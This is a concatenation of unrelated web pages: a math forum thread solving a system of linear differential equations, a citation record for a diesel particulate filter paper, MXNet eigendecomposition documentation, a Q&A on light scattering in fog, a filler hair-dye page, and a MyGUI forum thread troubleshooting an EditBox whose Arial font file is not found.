# Math Help - Linear system--I have this 1/2 solved...
1. ## Linear system--I have this 1/2 solved...
E1: (2D + 1)x1 + (D^2 - 4)x2 = -7e^(-t)
E2: Dx1 - (D + 2)x2 = -3e^(-t)
Here's how I solved for x1:
1. Multiply E2 by (D - 2) to get:
(D-2)Dx1 - (D^2 - 4)x2 = (D-2)(-3e^(-t))
2. Simplify the above and then add to E1 to get:
(D^2 + 1)x1 = 2e^(-t)
3. x1c = c1cos (t) + c2sin (t)
4. Then using Ae^(-t), x1p = e^(-t)
5. x1 = c1cos (t) + c2sin (t) + e^(-t)
How do I solve for x2? I'm lost again on this one! Thanks,
Kim
2. Originally Posted by Kim Nu
E1: (2D + 1)x1 + (D^2 - 4)x2 = -7e^(-t)
E2: Dx1 - (D + 2)x2 = -3e^(-t)
Here's how I solved for x1:
1. Multiply E2 by (D - 2) to get:
(D-2)Dx1 - (D^2 - 4)x2 = (D-2)(-3e^(-t))
2. Simplify the above and then add to E1 to get:
(D^2 + 1)x1 = 2e^(-t)
3. x1c = c1cos (t) + c2sin (t)
4. Then using Ae^(-t), x1p = e^(-t)
5. x1 = c1cos (t) + c2sin (t) + e^(-t)
How do I solve for x2? I'm lost again on this one! Thanks,
Kim
Go back to your original equations and try to eliminate $x_1$
Hint try $D \cdot E_1+[-(2D+1)]E_2$ and see what happens.
3. Hey thanks Empty Set,
Now my posts are definitely getting annoying but:
I took your suggestion, which is the correct course of action; I end up with
x2 = c3cos(t) + c4sin(t) + c3e^(-2t) + 2e^(-t)
Then I take the before mentioned solved x1 value and x2 value and plug them into E2: Dx1 - (D + 2)x2 = -3e^(-t)
I work this all out and end up with:
sin (t)[-c1 + c3 - 2c4] + cos (t)[c2 - c4 - 2c3] = -8e^(-t)
The answer in the back of the book is:
x1 = 5c1cos(t) + 5c2sin(t) + e^(-t)
x2 = (c1 + 2c2)cos(t) + (-2c1 + c2)sin(t) + c3e^(-2t) + 2e^(-t)
So my answers are close to being correct, I just don't understand how those coefficients were arrived at. Do you have any suggestions? Thanks,
Kim
4. Originally Posted by Kim Nu
Hey thanks Empty Set,
Now my posts are definitely getting annoying but:
I took your suggestion, which is the correct course of action; I end up with
x2 = c3cos(t) + c4sin(t) + c3e^(-2t) + 2e^(-t)
Then I take the before mentioned solved x1 value and x2 value and plug them into E2: Dx1 - (D + 2)x2 = -3e^(-t)
I work this all out and end up with:
sin (t)[-c1 + c3 - 2c4] + cos (t)[c2 - c4 - 2c3] = -8e^(-t)
The answer in the back of the book is:
x1 = 5c1cos(t) + 5c2sin(t) + e^(-t)
x2 = (c1 + 2c2)cos(t) + (-2c1 + c2)sin(t) + c3e^(-2t) + 2e^(-t)
So my answers are close to being correct, I just don't understand how those coefficients were arrived at. Do you have any suggestions? Thanks,
Kim
I think $x_2$ should be this
$x_2 = c_3\cos(t) + c_4\sin(t) + c_5e^{-2t} + 2e^{-t}$
And your $x_1$ from your 1st post is
$x_1 = c_1\cos (t) + c_2\sin (t) + e^{-t}$
So if we put these into $E_2$ we get...
$-c_1\sin(t)+c_2\cos(t)-e^{-t}-(-c_3\sin(t)+c_4\cos(t)-2c_5e^{-2t}-2e^{-t})-2(c_3\cos(t) +$
$c_4\sin(t) + c_5e^{-2t} + 2e^{-t})=-3e^{-t}$
$(-c_1+c_3-2c_4)\sin(t)+(c_2-c_4-2c_3)\cos(t)=0$
Now we have
$-c_1+c_3-2c_4=0$ and $c_2-c_4-2c_3=0$
We need to solve these for $c_3,c_4$
To get $c_3$ we want to eliminate $c_4$, so we multiply the 2nd by -2 and add it to the first to get
$-2(c_2-c_4-2c_3)-c_1+c_3-2c_4=0 \iff -c_1-2c_2+5c_3=0$
$5c_3=c_1+2c_2 \iff c_3=\frac{c_1+2c_2}{5}$
Now we need to find $c_4$, so we want to eliminate $c_3$; this time we multiply the first by 2 and add it to the 2nd
$2(-c_1+c_3-2c_4)+c_2-c_4-2c_3=0 \iff -2c_1+c_2-5c_4=0$
$c_4=\frac{-2c_1+c_2}{5}$
Now we finally can get the final solution
$x_1 = c_1\cos (t) + c_2\sin (t) + e^{-t}$
$x_2 = \frac{c_1+2c_2}{5}\cos(t) + \frac{-2c_1+c_2}{5}\sin(t) + c_5e^{-2t} + 2e^{-t}$
The answers are equivalent: if you replace $c_1=5k_1$ and $c_2=5k_2$ in both equations you will get the same answer.
Good luck.
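As a sanity check (not part of the original thread), a short SymPy sketch that substitutes the final solution back into E1 and E2; both residuals simplify to zero:

```python
import sympy as sp

t, c1, c2, c5 = sp.symbols('t c1 c2 c5')
D = lambda f: sp.diff(f, t)

x1 = c1*sp.cos(t) + c2*sp.sin(t) + sp.exp(-t)
x2 = ((c1 + 2*c2)/5)*sp.cos(t) + ((-2*c1 + c2)/5)*sp.sin(t) \
     + c5*sp.exp(-2*t) + 2*sp.exp(-t)

E1 = 2*D(x1) + x1 + D(D(x2)) - 4*x2   # (2D+1)x1 + (D^2-4)x2
E2 = D(x1) - D(x2) - 2*x2             # Dx1 - (D+2)x2

print(sp.simplify(E1 + 7*sp.exp(-t)))  # 0, i.e. E1 = -7e^(-t)
print(sp.simplify(E2 + 3*sp.exp(-t)))  # 0, i.e. E2 = -3e^(-t)
```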
|
|
Preprint Open Access
# Modelling Particle Mass and Particle Number Emissions during the Active Regeneration of Diesel Particulate Filters
Chung Ting Lao; Jethro Akroyd; Nickolas Eaves; Alastair Smith; Neal Morgan; Amit Bhave; Markus Kraft
### Citation Style Language JSON Export
{
"publisher": "Zenodo",
"DOI": "10.5281/zenodo.2609189",
"language": "eng",
"title": "Modelling Particle Mass and Particle Number Emissions during the Active Regeneration of Diesel Particulate Filters",
"issued": {
"date-parts": [
[
2019,
3,
26
]
]
},
"abstract": "<p>A new model has been developed to describe the size-dependent effects that are responsible for transient particle mass (PM) and particle number (PN) emissions observed during experiments of the active regeneration of Diesel Particulate Filters (DPFs). The model uses a population balance approach to describe the size of the particles entering and leaving the DPF, and accumulated within it. The population balance is coupled to a unit collector model that describes the filtration of the particles in the porous walls of the DPF and a reactor network model that is used to describe the geometry of the DPF. Two versions of the unit collector model were investigated. The original version, based on current literature, and an extended version, developed in this work, that includes terms to describe both the non-uniform regeneration of the cake and thermal expansion of the pores in the DPF. Simulations using the original unit collector model were able to provide a good description of the pressure drop and PM filtration efficiency during the loading of the DPF, but were unable to adequately describe the change in filtration efficiency during regeneration of the DPF. The introduction of the extended unit collector description enabled the model to describe both the timing of particle breakthrough and the final steady filtration efficiency of the hot regenerated DPF. Further work is required to understand better the transient behaviour of the system. In particular, we stress the importance that future experiments fully characterise the particle size distribution at both the inlet and outlet of the DPF.</p>",
"author": [
{
"family": "Chung Ting Laoa"
},
{
"family": "Jethro Akroyda"
},
{
"family": "Nickolas Eavesa"
},
{
"family": "Alastair Smith"
},
{
"family": "Neal Morgan"
},
{
"family": "Amit Bhave"
},
{
"family": "Markus Krafta"
}
],
"type": "article",
"id": "2609189"
}
|
|
# mxnet.ndarray.linalg.syevd¶
mxnet.ndarray.linalg.syevd(A=None, out=None, name=None, **kwargs)
Eigendecomposition for symmetric matrix. Input is a tensor A of dimension n >= 2.
If n=2, A must be symmetric, of shape (x, x). We compute the eigendecomposition, resulting in the orthonormal matrix U of eigenvectors, shape (x, x), and the vector L of eigenvalues, shape (x,), so that:
U * A = diag(L) * U
Here:
U * U^T = U^T * U = I
where I is the identity matrix. Also, L(0) <= L(1) <= L(2) <= … (ascending order).
If n>2, syevd is performed separately on the trailing two dimensions of A (batch mode). In this case, U has n dimensions like A, and L has n-1 dimensions.
Note
The operator supports float32 and float64 data types only.
Note
Derivatives for this operator are defined only if A is such that all its eigenvalues are distinct, and the eigengaps are not too small. If you need gradients, do not apply this operator to matrices with multiple eigenvalues.
Examples:
// Single symmetric eigendecomposition
A = [[1., 2.], [2., 4.]]
U, L = syevd(A)
U = [[0.89442719, -0.4472136],
[0.4472136, 0.89442719]]
L = [0., 5.]
// Batch symmetric eigendecomposition
A = [[[1., 2.], [2., 4.]],
[[1., 2.], [2., 5.]]]
U, L = syevd(A)
U = [[[0.89442719, -0.4472136],
[0.4472136, 0.89442719]],
[[0.92387953, -0.38268343],
[0.38268343, 0.92387953]]]
L = [[0., 5.],
[0.17157288, 5.82842712]]
Defined in src/operator/tensor/la_op.cc:L638
Parameters
• A (NDArray) – Tensor of input matrices to be factorized
• out (NDArray, optional) – The output NDArray to hold the result.
Returns
out – The output of this function.
Return type
NDArray or list of NDArrays
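A minimal usage sketch (assuming a working MXNet installation), mirroring the single-matrix example above:

```python
import mxnet as mx

A = mx.nd.array([[1., 2.], [2., 4.]])      # symmetric input
U, L = mx.nd.linalg.syevd(A)               # rows of U are the eigenvectors

print(L)                                   # [0. 5.], ascending order
print(mx.nd.dot(U, U, transpose_b=True))   # ~ identity, since U is orthonormal
```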
|
|
# What spectrum of light penetrates fog?
I am wondering what spectrum of light penetrates fog the best. I would like to know if IR light penetrates fog better than UV light, and why that is. Thank you for answers.
• A good guide is that the scattering intensity is $\sim 1/\lambda^4$, ($\lambda$ is wavelength) but there are different regimes depending in the size of the scattering particles vs the wavelength. On this basis ir has lower scattering than UV. – porphyrin Feb 19 at 18:01
• And continuing to longer wavelengths, there is terahertz radiation, for body scanning in airports, etc., and, of course, radar! Without radar, we would know very little of the surface of Venus, which, to put it mildly, is heavily fogged in! – Ed V Feb 20 at 1:10
• This is more of a physics question than a chemistry one. So, you should try physics.SE. – Nilay Ghosh Feb 20 at 4:41
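To put rough numbers on the $\sim 1/\lambda^4$ guide from the first comment (the wavelength choices below are assumptions, and fog droplets are usually large enough that Mie scattering, not this Rayleigh scaling, applies):

```python
# Rayleigh-regime estimate only; micron-sized fog droplets are in the Mie
# regime, where scattering depends much more weakly on wavelength.
uv_nm, ir_nm = 350.0, 1000.0                   # example UV and near-IR wavelengths
ratio = (uv_nm / ir_nm) ** 4                   # I_IR / I_UV under 1/lambda^4
print(f"near-IR is scattered ~{1/ratio:.0f}x less than UV")  # ~67x
```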
|
|
# The 14 Common Stereotypes When It Comes To Long Lasting Red Hair Dye | Long Lasting Red Hair Dye
Welcome to our web page. On this page you can find a lot of very interesting images. Our image collection can add to your inspiration about long lasting red hair dye. You can search for loads of things that you need by looking at the collections we have. Make sure you get inspiration from the content that we present.
|
|
textbox multiline
nevarim
04-04-2012 13:53:30
hi all
is there a possibility to make a textbox multiline without a scrollbar?
i want to write 2 lines in an editbox with center alignment
thanks of all
Nevarim
Altren
05-04-2012 10:44:54
Enable multiline. And if your text fits into the EditBox you won't see scrolls. If it doesn't fit you can manually disable scroll visibility (VisibleVScroll and VisibleHScroll properties).
Edit: actually the default EditBox skin doesn't have scrolls, so you don't need to do anything special.
nevarim
05-04-2012 12:44:05
in the layout editor i don't find the multiline property
Altren
05-04-2012 13:17:11
Ah, you should use the EditBox widget and enable ReadOnly mode, since TextBox supports only simple single-line texts.
nevarim
05-04-2012 14:07:43
really thanks
it works well
nevarim
05-04-2012 23:37:44
in the editbox i'm trying to put in a text (2000 characters) but the application crashes. is it impossible to put a long text in an editbox?
thanks
Nevarim
nevarim
11-04-2012 17:06:12
any hint on this problem?
editbox crash when i try to put in a text long (a description)
thanks
Nevarim
Altren
12-04-2012 09:14:00
Try to debug your application. Or do something to let me reproduce this, because too long texts are cropped, but don't crash. I failed to reproduce your problem and can't find the reason.
nevarim
12-04-2012 18:02:33
maybe i found the problem: it seems that when i load letters such as à ò è ù ì into the editbox it crashes. it seems to be a problem with Ogre::String
do you have hint?
nevarim
12-04-2012 18:19:34
Unhandled exception at 0x761cb9bc in bloodcolony.exe: Microsoft C++ exception: MyGUI::UString::invalid_data at memory location 0x003bce38.
nevarim
12-04-2012 18:35:46
maybe i found the real problem, it is a font problem
viewtopic.php?f=17&t=11629
but i don't understand how i can solve it. i tried to add arial.ttf in core_font and it seems that the accented letters in it aren't used, but arial includes them.....
i use this code
```
<Resource type="ResourceTrueTypeFont" name="Arial">
    <Property key="Source" value="arial.ttf"/>
    <Property key="Size" value="19"/>
    <Property key="Resolution" value="50"/>
    <Property key="Antialias" value="false"/>
    <Property key="SpaceWidth" value="4"/>
    <Property key="TabWidth" value="8"/>
    <Property key="CursorWidth" value="2"/>
    <Property key="Distance" value="6"/>
    <Property key="OffsetHeight" value="0"/>
</Resource>
```
and include arial.ttf in folder
Altren
12-04-2012 20:04:28
I guess the problem is that you are trying to add a non-UTF8 string. For characters not defined in the font, MyGUI replaces them with a special glyph for an undefined character (usually looks like an empty square). I'll try to figure out why it is not converted properly.
nevarim
12-04-2012 21:43:08
thanks
i tried to add the font arial, and in the font viewer i see accented chars as squares :S with all fonts loaded in windows
nevarim
17-04-2012 04:05:29
tried also with a custom font, but nothing doing; none of the accented chars are recognized
Altren
17-04-2012 10:50:20
I just opened the font viewer with the default font (DejaVuSans.ttf), clicked generate and then pasted "à ò è ù ì" in the edit box, and I see characters instead of squares.
Remember that the default font doesn't include these characters, and you won't see them until you click generate in the font viewer.
Edit: also tried with arial.ttf from my os (windows 7) and it works fine as well.
nevarim
17-04-2012 20:24:38
i tried again
directly in the layout editor, using my layout, i write an accented letter in the editbox caption property with the font arial, and i get a square in the property box and the right accented letter in the editbox
but in the program, with the layout loaded, i have the same problem (mygui string not properly loaded)
those are files used
core_font
```
<?xml version="1.0" encoding="UTF-8"?>
<MyGUI type="Resource" version="1.1">
    <Resource type="ResourceTrueTypeFont" name="DejaVuSansFont.15">
        <Property key="Source" value="DejaVuSans.ttf"/>
        <Property key="Size" value="10"/>
        <Codes>
            <Code range="32 126"/>
            <Code range="1025 1105"/>
            <Code range="8470"/>
            <Code hide="1026 1039"/>
            <Code hide="1104"/>
        </Codes>
    </Resource>
    <Resource type="ResourceTrueTypeFont" name="Arial">
        <Property key="Source" value="arial.ttf"/>
        <Property key="Size" value="10"/>
    </Resource>
    <Resource type="ResourceTrueTypeFont" name="BlackForest">
        <Property key="Source" value="blackforest.ttf"/>
        <Property key="Size" value="10"/>
    </Resource>
</MyGUI>
```
layout
```
<?xml version="1.0" encoding="UTF-8"?>
<MyGUI type="Layout" version="3.2.0">
    <Widget type="ImageBox" skin="ImageBox" position="0 0 1440 900" layer="Back" name="CRRBG">
        <Property key="Texture" value="ifc_cr_race.png"/>
        <Property key="ImageTexture" value="ifc_cr_race.png"/>
        <Widget type="Button" skin="Button" position="40 32 208 56" name="CRRBGUM">
            <Property key="Caption" value="Umano"/>
            <UserString key="DBINDEX" value="1"/>
        </Widget>
        <Widget type="Button" skin="Button" position="40 104 208 56" name="CRRBGNA">
            <Property key="Caption" value="Nano"/>
            <UserString key="DBINDEX" value="2"/>
        </Widget>
        <Widget type="Button" skin="Button" position="40 176 208 56" name="CRRBGEL">
            <Property key="Caption" value="Elfo"/>
            <UserString key="DBINDEX" value="3"/>
        </Widget>
        <Widget type="Button" skin="Button" position="40 248 208 56" name="CRRBGHA">
            <Property key="Caption" value="Halfling"/>
            <UserString key="DBINDEX" value="8"/>
        </Widget>
        <Widget type="Button" skin="Button" position="1180 32 208 56" name="CRRBGMO">
            <Property key="Caption" value="Mezzorco"/>
            <UserString key="DBINDEX" value="9"/>
        </Widget>
        <Widget type="Button" skin="Button" position="1180 104 208 56" name="CRRBGMD">
            <Property key="Caption" value="Stirpe Demoniaca"/>
            <UserString key="DBINDEX" value="6"/>
        </Widget>
        <Widget type="Button" skin="Button" position="1180 176 208 56" name="CRRBGMA">
            <Property key="Caption" value="Stirpe Angelica"/>
            <UserString key="DBINDEX" value="5"/>
        </Widget>
        <Widget type="Button" skin="Button" position="1180 248 208 56" name="CRRBGME">
            <Property key="Caption" value="Mezz'elfo"/>
            <UserString key="DBINDEX" value="4"/>
        </Widget>
        <Widget type="Button" skin="Button" position="40 320 208 56" name="CRRBGGN">
            <Property key="Caption" value="Gnomo"/>
            <UserString key="DBINDEX" value="7"/>
        </Widget>
        <Widget type="ImageBox" skin="ImageBox" position="736 32 352 552" name="CRRBGIM"/>
        <Widget type="Button" skin="Button" position="1185 800 104 72" name="CRRBGES"/>
        <Widget type="Button" skin="Button" position="1295 800 104 72" name="CRRBGAV"/>
        <Widget type="EditBox" skin="EditBox" position="320 32 352 552" name="CRRBGD">
            <Property key="MultiLine" value="true"/>
            <Property key="ReadOnly" value="true"/>
            <Property key="WordWrap" value="true"/>
            <Property key="TextAlign" value="Left Top"/>
            <Property key="FontName" value="Arial"/>
            <Property key="Caption" value="òàùòàùòàù"/>
        </Widget>
        <Widget type="TextBox" skin="TextBox" position="1185 775 210 20" name="CRRBGRC"/>
    </Widget>
</MyGUI>
```
what is the error?
thanks
Nevarim
Altren
18-04-2012 00:21:53
Just tried to use your layout in an application with the given font definition - everything works fine and I see these characters.
What about the squares in the layout editor - they appear because the default DejaVuSans with fixed code ranges is used, so this is expected behaviour.
Do you actually see other characters in that edit box? Maybe there's something wrong with your resources and that font is not generated at all. Also show your log.
Also check - maybe you have one font definition, but some other file is actually loaded...
nevarim
18-04-2012 08:27:59
in that editbox i see all the normal fonts. what do you mean about resources?
this evening i will attach the log file too
Nevarim
nevarim
18-04-2012 20:03:09
```21:37:21 | Platform | Info | * Initialise: RenderManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 43 21:37:21 | Platform | Info | RenderManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 71 21:37:21 | Platform | Info | * Initialise: DataManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 27 21:37:21 | Platform | Info | DataManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 35 21:37:21 | Core | Info | * Initialise: Gui | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 75 21:37:21 | Core | Info | * MyGUI version 3.2.0 | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 87 21:37:21 | Core | Info | * Initialise: ResourceManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 48 21:37:21 | Core | Info | ResourceManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 56 21:37:21 | Core | Info | * Initialise: LayerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 49 21:37:21 | Core | Info | LayerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 57 21:37:21 | Core | Info | * Initialise: WidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 67 21:37:21 | Core | Info | WidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 98 21:37:21 | Core | Info | * Initialise: InputManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 58 21:37:21 | Core | Info | InputManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 78 21:37:21 | Core | Info | * Initialise: SubWidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 49 21:37:21 | Core | Info | SubWidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 69 21:37:21 | Core | Info | * Initialise: SkinManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 53 21:37:21 | Core | Info | SkinManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 61 21:37:21 | Core | Info | * Initialise: FontManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 48 21:37:21 | Core | Info | FontManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 57 21:37:21 | Core | Info | * Initialise: ControllerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 46 21:37:21 | Core | Info | ControllerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 56 21:37:21 | Core | Info | * Initialise: PointerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 60 21:37:21 | Core | Info | PointerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 78 21:37:21 | Core | Info | * Initialise: ClipboardManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 87 21:37:21 | Core | Info | ClipboardManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 101 21:37:21 | 
Core | Info | * Initialise: LayoutManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 45 21:37:21 | Core | Info | LayoutManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 50 21:37:21 | Core | Info | * Initialise: DynLibManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 41 21:37:21 | Core | Info | DynLibManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 45 21:37:21 | Core | Info | * Initialise: PluginManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 45 21:37:21 | Core | Info | PluginManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 49 21:37:21 | Core | Info | * Initialise: LanguageManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 45 21:37:21 | Core | Info | LanguageManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 49 21:37:21 | Core | Info | * Initialise: FactoryManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 40 21:37:21 | Core | Info | FactoryManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 42 21:37:21 | Core | Info | * Initialise: ToolTipManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 48 21:37:21 | Core | Info | ToolTipManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 60 21:37:21 | Core | Info | Load ini file 'MyGUI_Fonts.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using texture size 128 x 256. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using real height 17 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 21:37:21 | Platform | Warning | Cannot locate resource arial.ttf in resource group General or any other group. | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 59 21:37:21 | Core | Error | ResourceTrueTypeFont: Could not load the font 'Arial'! | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 449 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using texture size 128 x 128. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 21:37:21 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using real height 14 pixels. 
| G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 21:37:21 | Core | Info | Load ini file 'MyGUI_Images.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Load ini file 'MyGUI_CommonSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Register value : 'HCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 238 21:37:21 | Core | Info | Register value : 'VCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 239 21:37:21 | Core | Info | Register value : 'Center' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 240 21:37:21 | Core | Info | Register value : 'Left' = 2 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 241 21:37:21 | Core | Info | Register value : 'Right' = 4 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 242 21:37:21 | Core | Info | Register value : 'HStretch' = 6 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 243 21:37:21 | Core | Info | Register value : 'Top' = 8 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 244 21:37:21 | Core | Info | Register value : 'Bottom' = 16 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 245 21:37:21 | Core | Info | Register value : 'VStretch' = 24 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 246 21:37:21 | Core | Info | Register value : 'Stretch' = 30 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 247 21:37:21 | Core | Info | Register value : 'Default' = 10 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 248 21:37:21 | Core | Info | Load ini file 'MyGUI_BlueWhiteTheme.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Load ini file 'MyGUI_BlueWhiteImages.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:21 | Core | Info | Load ini file 'MyGUI_BlueWhiteSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_BlueWhiteTemplates.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_Pointers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_Layers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Load ini file 'MyGUI_Settings.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 21:37:22 | Core | Info | Gui successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 133 21:37:22 | Core | Warning | Widget property 'Texture' not found [ifc_login.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 21:37:22 | Core | Warning | Texture 'ifc_login.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 21:37:26 | Core | Warning | Widget property 'Texture' not found [ifc_main.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 21:37:27 | Core | Warning | Texture 'ifc_main.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 21:37:28 | Core | Warning | Widget property 'Texture' not found [ifc_cr_race.layout] | 
G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 21:37:28 | Core | Warning | Texture 'ifc_cr_race.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 ```
Altren
19-04-2012 19:14:19
```
21:37:21 | Platform | Warning | Cannot locate resource arial.ttf in resource group General or any other group. | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 59
21:37:21 | Core | Error | ResourceTrueTypeFont: Could not load the font 'Arial'! | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 449
```
So it looks like that font is not in any of your resource folders, and it was not loaded at all.
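In case it helps others hitting this: the warning means Ogre's resource system has no registered location containing arial.ttf. A minimal sketch of registering such a folder in code, before MyGUI::Gui::initialise() (the path "media/fonts" is a hypothetical placeholder; the call itself is the standard Ogre resource API):

```
// Tell Ogre about the directory that holds arial.ttf, so that MyGUI's
// OgreDataManager can locate it. "media/fonts" is a placeholder path.
Ogre::ResourceGroupManager::getSingleton().addResourceLocation(
    "media/fonts",  // directory to scan
    "FileSystem",   // archive type
    "General");     // the resource group named in the warning
```

In the usual Ogre sample setup, listing the same folder under the appropriate section of resources.cfg has the same effect.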
nevarim
25-04-2012 17:29:57
Hi Altren, I have a problem with the font again. I have now put the font in the right folder correctly, but I still have the same problem. Here are the logs:
